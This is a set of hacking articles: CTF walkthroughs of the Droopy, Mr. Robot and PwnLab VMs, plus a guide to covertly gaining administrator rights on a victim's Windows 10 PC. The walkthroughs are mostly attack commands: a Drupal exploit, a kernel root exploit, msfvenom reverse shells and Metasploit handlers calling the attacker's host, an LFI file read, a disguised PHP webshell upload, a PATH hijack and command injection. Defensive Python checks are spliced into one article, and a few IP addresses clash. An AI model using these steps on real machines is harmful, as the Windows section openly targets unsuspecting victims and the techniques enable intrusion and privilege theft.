Hack the Droopy VM (CTF Challenge)



Droopy Walkthrough
In this article we will complete another challenge in the Capture the Flag series: a walkthrough of the Droopy VM, a vulnerable machine that is a little more complex than most. Download it from –> Here
Walkthrough
Let us start by scanning the network so that we can find the IP of our target. To scan the network, type the following:
netdiscover

From the output of the above command we know our target IP is 192.168.1.102. Now that we know the target IP, let's study it in more detail using nmap:
nmap -p- -A 192.168.1.102
Here,
-p- --> scans every port
-A --> enables an aggressive (thorough) scan
Nmap shows that port 80 is the only open port, so let's open the IP in the browser.
By studying the web page we learn that the website is built on the Drupal CMS. There is a very effective exploit for it in Metasploit; to use it, type:
use exploit/multi/http/drupal_drupageddon
Once the exploit module loads, set rhost with the following command and then run the exploit.
set rhost 192.168.1.102
exploit
As the exploit runs, you will get a meterpreter session. Type sysinfo as the first command to gather information about the target. This tells us that the target OS is Linux with kernel version 3.13.0, and this version has its own exploit which you can find on www.exploit-db.com. Once you find the exploit there, download it and then type the following command in the Kali terminal:
searchsploit 3.13.0
Go to the /tmp folder by typing cd /tmp and upload the exploit there by typing :
upload /root/Desktop/37292.c
Once the exploit is uploaded, drop to a shell by simply giving the shell command. Then type:
python -c 'import pty;pty.spawn("/bin/bash")'
And then type the following command to compile the exploit :
gcc 37292.c -o shell
Once the exploit is compiled, give execute permissions to shell:
chmod 777 shell
and then run ./shell to trigger the exploit. This is a privilege escalation exploit, so when it runs you will have root privileges on the VM.
After this, check your id by simply typing id. It shows that you are root. So let's jump to the root folder by typing cd /root and then ls to check the files inside it. Here we have one file in /root. Let's copy it to /var/www/html so we can open the file in the browser:
cp dave.tc /var/www/html
Now let's open the file in the browser by typing:
192.168.1.102/dave.tc
Then we go into /var by typing cd /var and ls to view its content. Now let's go into mail by typing cd mail and then ls to view its content, and then type cat www-data to read whatever is inside it.
In www-data we find a mail. This mail gives us two hints about the password we need: we will find our password in the rockyou wordlist, and the password contains "academy" as a prefix or suffix. So we will take all the words from the rockyou wordlist that contain academy and make a separate wordlist of all the possible passwords. For this, type:
cat rockyou.txt | grep academy > /root/Desktop/dict.txt
Now, using the wordlist we just created, we run a dictionary attack to recover the password. For this, type:
truecrack --truecrypt /root/Downloads/dave.tc -k SHA512 -w /root/Desktop/dict.txt
Now, using VeraCrypt, we can decrypt the file.
To decrypt it, enter the password we just found.
Once it opens you can see all of its content.
Following are the folders you will find in it.

Open its path in the Kali terminal and type ls -la to view the files. Open the hidden .secret directory by typing cd .secret and then ls -la to see its content. Then open .top by typing cd .top and ls -la to see all the files in it. There you will find flag.txt; type cat flag.txt to view the flag.

And yippiiee!!! We found our flag. 😊


Hack Admin Access of Remote Windows 10 PC using TpmInitUACBypass

Microsoft keeps increasing security with each evolution of Windows, and with that it is getting harder and harder to hack. As the saying goes, "where there is a will, there is a way", so thankfully it is not impossible. Once you have hacked into a Windows 10 PC, it is difficult to gain administrator access without making your victim suspicious. Therefore, we present a new way to do so.
Follow the steps below and you will learn how to gain administrator access to a Windows 10 PC without the victim's suspicion.
First of all, to learn how to hack the victim's PC click here.
Once you have gained a meterpreter session after hacking, type:

getsystem

This command will confirm that you do not have administrator privileges yet. So now, there is no need to worry; just download the TpmInit file from --> here
Now upload the said file to the victim's PC by typing:

upload /root/Desktop/TpmInitUACBypass.exe d:\\

Here,
upload --> uploads a file
/root/Desktop/TpmInitUACBypass.exe --> is the path of the file to be uploaded
d:\\ --> is the location on the victim's PC where the file will be uploaded


As the file is uploaded, open Metasploit in parallel and type:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 102.168.0.106
set lport 443
exploit


Once this exploit is executed, go to the meterpreter session that you previously had and type:
shell

Typing shell will drop you into the shell of the PC. Now type:

d: (this command takes you into the D drive of the victim's PC, i.e. where you uploaded your file)

TpmInitUACBypass.exe 192.168.0.106 msf (this command executes your uploaded file)


As the command executes our file, we get a session with administrator privileges, as shown.


Hack the Mr. Robot VM (CTF Challenge)


This is another article in our root2boot penetration testing challenge series. We will walk through an exploitable VM, Mr. Robot. It is based on the TV show Mr. Robot and has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively harder to find. Breaking into it isn't too difficult; there isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
First, download the Mr. Robot lab from here
Penetrating Methodology:
· Network Scanning (Nmap, netdiscover)
· Recon (Nikto)
· Use robots.txt
· Grab 1st key
· Download fsocity.dic file and use it as a dictionary
· WordPress password cracking (wpscan)
· Login into WordPress
· Generate PHP backdoor (msfvenom)
· Upload and execute the backdoor
· Reverse connection (Metasploit)
· Get MD5 hash and crack it
· Import Python one-liner for a proper TTY shell
· find / -perm -u=s for privilege escalation
· Get root access and capture the flag.


First of all we have to find its IP address. For that, go to your Kali terminal and type:
netdiscover




Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.1.103, let us scan it.
To scan our target IP we will use an aggressive scan (-A):
nmap -p- -A 192.168.1.103





The scan result shows that the open ports are 22, 80 and 443. As port 80 is open, we can try opening this IP in our browser.




And yes, it opens which further confirms our target.
Next we will run nikto against it. Nikto will help us gather information such as its files and all the other major things we ought to know about our target. So type:
nikto -h 192.168.1.103
From the result we can gather that there is a text file named robots.txt which might provide some further information. Moreover, it also tells us that a WordPress installation was found.




So now let us try to open robots.txt in the browser. Yesssssssss!! It gave us something; let's open each file one by one.




Excellent!!! Inside key-1-of-3.txt we found our 1st key.




Now open the fsocity.dic file in the browser; it is a dictionary file. When we open it in the browser, it asks us to download it. We downloaded and opened it: it is a file which may contain usernames or passwords.




So now that we know we might have usernames or passwords, we will try to log in to our target. One by one we tried every username and it gave the error that the username doesn't exist. But when we used the name elliot it gave the error that the password is empty.
With this we know one thing for sure: elliot is a valid username, and now we just have to find its password.




Our best guess for finding the password is the same dictionary file from which we found the username. Thus, moving forward, we will use WPScan to find our password from the same file.
wpscan -u http://192.168.1.103/ --username Elliot --wordlist /root/Desktop/fsocity.dic
When the execution completes (which may take a long time; in our case it took almost 4 hours) you will have the password for the username elliot, which is ER28-0652.




Using the password, log in to WordPress and open the 404 template under the theme editor.




Once you have logged in, create the malicious file that you are going to upload into it. Generate the code with the msfvenom command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
On the other hand, run multi/handler inside the Metasploit framework.




Copy the generated code up to die(); and paste it into the template (and save it).
Now that you have access to the WordPress admin console, one option is to replace one of the theme templates with PHP of your own. I decided to try for a reverse shell by editing the 404.php theme file and replacing its contents with the msfvenom-generated shell.
Once the PHP code is saved, open the path of the template in the browser as shown:
Browse to http://192.168.1.103/wp-content/themes/twentyfifteen/404.php and press enter




Meanwhile, return to the Metasploit terminal and wait for the meterpreter session from the multi/handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From the image below you can observe Meterpreter session 1. But the task is not finished yet; we still need to go further for privilege escalation.
cd home
ls
Now, to get information about the robot folder/file, we will type:
We now know that there are two important files: one is a text file, the other is a password in the form of an MD5 hash. If we try to open the text file by typing:
cat key-2-of-3.txt
It will not open, as we do not have permission to do so. But now let us try to open the MD5 file; for that, type:
cat password.raw-md5
Executing the above command gives the MD5 value (hash) of the password, as you can see below:




We will use an online MD5 cracking tool for this hash. Enter the MD5 value into the hash box and obtain the result. The value translates to abcdefghijklmnopqrstuvwxyz as shown below.




Then, to get a proper TTY shell, we import the Python one-liner by typing the following:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
Now in the terminal try to switch the user to robot by the command:
su robot
It will then ask you for the password. Enter the cracked MD5 password here and you will become the robot user; to look around, type:
ls
Now, try to open the remaining text file by typing:
cat key-2-of-3.txt
Here I will read the second key file




Now let's find all those files that have the SUID bit set (they run with their owner's privileges) by using the following command.
find / -perm -u=s -type f 2>/dev/null
It shows many binaries, but I was interested in nmap in its output.




Nmap supported an option called "interactive". With this option, users were able to execute shell commands from an nmap "shell" (interactive shell).
Next type the following:
nmap --interactive
The above command drops you into nmap; then type:
!sh
id (to check your current user)
cd /root (takes you into root's home directory)
Once you are in /root, type:
ls -lsa
cat key-3-of-3.txt
Upon execution we obtain the 3rd of 3 keys, thus completing Mr. Robot. There are many ways to perform the above, but this method is the easiest. We hope you find it effective and interesting and that it helps you improve.


Penetration Testing in PwnLab (CTF Challenge)


In this article we will walk through a root2boot penetration testing challenge, PwnLab. PwnLab is a vulnerable VM based on the concept of CTF (capture the flag), with a bit of security that is a little complicated to bypass. But it's not impossible. So let us learn how to get access to it.
Download From Here
Penetrating Methodology:
Network Scanning (Nmap, netdiscover)
Information Gathering (Nikto)
Abusing config.php file (curl & PHP filter convert)
Obtain Mysql Database credential
Extract user credential from Mysql Database
Login to web application
Upload webshell (PHP reverse shell)
Executing Uploaded PHP backdoor (Burp suit)
Netcat session
Import python one-liner for proper TTY shell
Find SUID Binaries
Privilege Escalation by Manipulating $PATH
Get Root access and capture the flag.

Let’s Start!!!
To start, let us assume that we do not know the IP of PwnLab, so we need to find its IP address first. There is a command that shows us all the IPs present in our network; go to your Kali terminal and type:
netdiscover



Target IP = 192.168.1.103
Knowing that, we start our penetration testing. First we scan with nmap; we use an aggressive scan as it gives detailed information and is fast. The command is:

nmap -A 192.168.1.13


We have the scan result and, as you can see, only three ports are open: 80, 111 and 3306. That is our best shot, but to be sure let us also check this IP in the browser. There we can see that PwnLab has three pages: home, login and upload. To get into the server we have to upload our code to it, and for that we must know a username and password.


As we need a username and password, we will use nikto to find the file that stores them. Nikto helps us learn the file names and the data they contain. The command for this is:
nikto -h http://192.168.1.103
As you can see, nikto reports "/config.php: PHP Config file may contain database IDs and passwords"; this is the file that has the username and password. Moreover, login.php, the admin login page, is found.


When we open the target IP in the browser and explore the Login tab, it gives a login form as shown below. As we were unaware of its login credentials we tried SQL injection techniques, but nothing was useful, so the last option was to use curl. If you observe the URL http://192.168.1.103/?page=login, you can tell that it looks like LFI.


But it was not that easy to extract information by exploiting the LFI with ../etc/passwd, so with a bit more effort, and taking help from my previous article, we used curl to read the data inside config.php with the help of the PHP base64-encode filter.
curl http://192.168.1.103/index.php?page=php://filter/convert.base64-encode/resource=config


The highlighted part of the above image is our result and contains the username and password. But note that the information is base64-encoded, which we will have to decode in order to read it. To decode it, copy the base64 text and follow the syntax below.
echo 'base64 encoded text' | base64 -d
Thus we found the following information after decoding.
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";

So, the username is root and the password is H4u%QJ_H99.
Now we use the MySQL client to see the usernames and passwords. The command is:
mysql -h 192.168.1.103 -u root -p Users
After typing the command it asks for the password; enter the decoded password and press enter.

kent | Sld6WHVCSkpOeQ
mike | U0lmZHNURW42SQ
kane | aVN2NVltMkdSbw

And so you have the usernames and passwords; in this case the usernames are kent, mike and kane, with their passwords in base64.

To decode each password follow the same method using echo with base64 -d as shown, and you will get the passwords.
Kent: JWzXuBJJNy
Mike: SIfdsTEn6I
Kane: iSv5Ym2GRo
Using kane's credentials we log in successfully; with the help of the upload option we can upload any image.

Here, the upload option is a dynamic opportunity for us, because through it we can upload a backdoor file for a reverse connection. We know that Kali Linux ships several PHP backdoors; among those we used /usr/share/webshells/php/php-reverse-shell.php. BUT you need to modify it by adding the GIF header GIF89a at the top and save it as shell.gif, because here you can only upload a file with the extension GIF, png or img.

After changing the extension, when you try to upload the file you will succeed. Now the uploaded file must be executed to achieve the reverse connection; once the file is uploaded, we still need a way to execute it. For that, right-click on that file and click the "copy image location" option. Then open a new terminal and start a Netcat listener for the reverse connection.
nc -lvp 1234

Now capture its HTTP request inside Burp Suite or Tamper Data. Here it shows that the "lang" parameter is set as a cookie, and it might be usable for executing our malicious file. Inside the cookie option delete whatever was written and type:
lang=../*Image location path*
Here,
*image location path* is the path of the file that you uploaded and copied afterwards.
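As an added defender-side example (not part of the original walkthrough and not PwnLab's own code), the following Python check flags both include vectors used above, the page query parameter abused with php://filter and the lang cookie abused with ../, on constructed raw HTTP requests. The allowed page names are the three pages listed earlier; the language codes and the sample requests are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumptions: the app's legitimate page names (the three the walkthrough lists)
# and the language codes it ships (constructed for this example).
ALLOWED_PAGES = {"home", "login", "upload"}
ALLOWED_LANGS = {"en", "fr", "es"}
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)  # php://, data://, expect:// ...
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")    # a ".." path segment

# Constructed requests (raw HTTP, as Burp shows them), not captures from the VM.
SAMPLE_REQUESTS = [
    "GET /?page=login HTTP/1.1\r\nHost: 192.168.1.103\r\nCookie: lang=en\r\n\r\n",
    "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1\r\n"
    "Host: 192.168.1.103\r\n\r\n",
    "GET /?page=upload HTTP/1.1\r\nHost: 192.168.1.103\r\n"
    "Cookie: lang=../upload/shell.gif\r\n\r\n",
    "GET /?page=..%252F..%252Fetc%252Fpasswd HTTP/1.1\r\nHost: 192.168.1.103\r\n\r\n",
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so ..%252F cannot slip past the checks."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_include_value(name, value, allowed):
    """Findings for one value handed to include(): wrapper, traversal, allowlist."""
    value = decode_fully(value)
    findings = []
    if WRAPPER_RE.match(value):
        findings.append(f"{name}: stream wrapper {value.split(':', 1)[0]}://")
    if TRAVERSAL_RE.search(value):
        findings.append(f"{name}: directory traversal")
    if value not in allowed:
        findings.append(f"{name}: value not in allowlist")
    return findings

def inspect_request(raw):
    """Check both include sources PwnLab uses, the 'page' query parameter and
    the 'lang' cookie; returns a list of findings (empty means clean)."""
    request_line, *header_lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    target = request_line.split(" ")[1]
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in header_lines)}
    cookies = dict(p.strip().partition("=")[::2]
                   for p in headers.get("cookie", "").split(";"))
    findings = []
    for page in parse_qs(urlsplit(target).query).get("page", []):
        findings += check_include_value("page", page, ALLOWED_PAGES)
    if "lang" in cookies:
        findings += check_include_value("lang", cookies["lang"], ALLOWED_LANGS)
    return findings
```

Because the lang vector travels in a cookie, it is invisible in the default combined access log; this check needs full request capture (a WAF or mod_security style log), and the allowlist comparison is also the server-side fix for the include itself.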

Once the above changes are done, forward the intercepted request and open the terminal where the netcat listener was started; there you will find the reverse connection from the victim's machine. To get a proper tty shell, execute the command below and start penetrating further to get the flag.
python -c 'import pty; pty.spawn("/bin/sh")'
cd /home
ls
su kane
iSv5Ym2GRo
Here,
su –> denotes the switch user
kane –> the user you want to switch to
iSv5Ym2GRo –> is the password
Next, if you type ls you will see that there is a folder named home in the user we just entered. So we will go into that folder; to do so, type:
cd home
ls
cd kane
ls
Then, by using the following command, you can enumerate all binaries having SUID permission.
find / -perm -u=s -type f 2>/dev/null
As you can see in the image below, there is a file in kane's home directory called msgmike. Let us try to run it; type:
./msgmike

When we run the msgmike file, it puts up an error message: "cat: /home/mike/msg.txt No such file or directory"
The most important thing to consider here is that the author has set the SUID bit on msgmike, and it might be a small program that calls a system binary such as cat to read a file from the given path, i.e. /home/mike/msg.txt, but cat fails to find the msg.txt file or directory. Taking advantage of this, we will manipulate the PATH environment variable so that the call to cat runs /bin/bash under user Mike.
To do this follow below steps:
echo $PATH
echo '/bin/sh' > cat
chmod 777 cat
export PATH=./:$PATH
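To show why the bare cat inside msgmike is hijackable and what the fixed lookup looks like, here is an added Python example (not the VM's code and not the walkthrough's): it mimics the shell's PATH search, audits a PATH value for untrustworthy entries, and runs the command the hardened way. The trusted PATH value and the temporary fake cat are assumptions constructed for the demonstration.

```python
import os
import shutil
import stat
import subprocess
import tempfile

TRUSTED_PATH = "/usr/bin:/bin"  # assumption: the fixed search path privileged code should use

def risky_path_entries(path_env):
    """PATH entries a SUID program must not trust: empty or relative entries
    (resolved against the caller's cwd) and directories writable by others."""
    risky = []
    for entry in path_env.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            risky.append(entry or "(empty)")
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue
        if mode & (stat.S_IWGRP | stat.S_IWOTH) and not mode & stat.S_ISVTX:
            risky.append(entry)
    return risky

def resolve_like_system(cmd, path_env, cwd):
    """Mimic how /bin/sh resolves the bare name in system("cat ..."): first
    executable match in PATH order, with relative entries joined to cwd."""
    for entry in path_env.split(os.pathsep):
        base = entry if os.path.isabs(entry) else os.path.join(cwd, entry or ".")
        candidate = os.path.normpath(os.path.join(base, cmd))
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def run_hardened(argv):
    """Defensive form: locate the executable only via TRUSTED_PATH and run it
    with a sanitized environment, so the caller's PATH cannot steer the lookup."""
    exe = shutil.which(argv[0], path=TRUSTED_PATH)
    if exe is None:
        raise FileNotFoundError(argv[0])
    proc = subprocess.run([exe, *argv[1:]], env={"PATH": TRUSTED_PATH},
                          capture_output=True, text=True)
    return exe, proc.returncode

def demo():
    """Constructed scenario: an attacker-writable cwd holding a fake 'cat'
    (never executed here) and PATH=./:$PATH, as in the walkthrough."""
    with tempfile.TemporaryDirectory() as cwd:
        fake = os.path.join(cwd, "cat")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho hijacked\n")
        os.chmod(fake, 0o755)
        hijacked = "./" + os.pathsep + TRUSTED_PATH
        exe, rc = run_hardened(["cat", fake])  # the real cat just prints the fake
        return {"resolved": resolve_like_system("cat", hijacked, cwd), "fake": fake,
                "risky": risky_path_entries(hijacked), "hardened_exe": exe,
                "hardened_rc": rc}
```

The same reasoning applies to the C program behind msgmike: calling system() with an absolute path and a scrubbed environment, or dropping the SUID bit, removes the hijack.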

Now run msgmike again and you will get user Mike's access. All the above steps were performed for privilege escalation to user Mike, but root escalation is connected to this phase indirectly: Mike has a file msg2root which takes any input command as a message to root.
cd mike
ls
So when you run the msg2root file, it asks you to enter a message for root, which is taken as an input value; you can utilize this opportunity for privilege escalation as shown.
./msg2root
test; /bin/sh
id
cd /root
cat flag.txt

HURRAYYYYYYYYYYYYY!! We hit the goal and solved this challenge.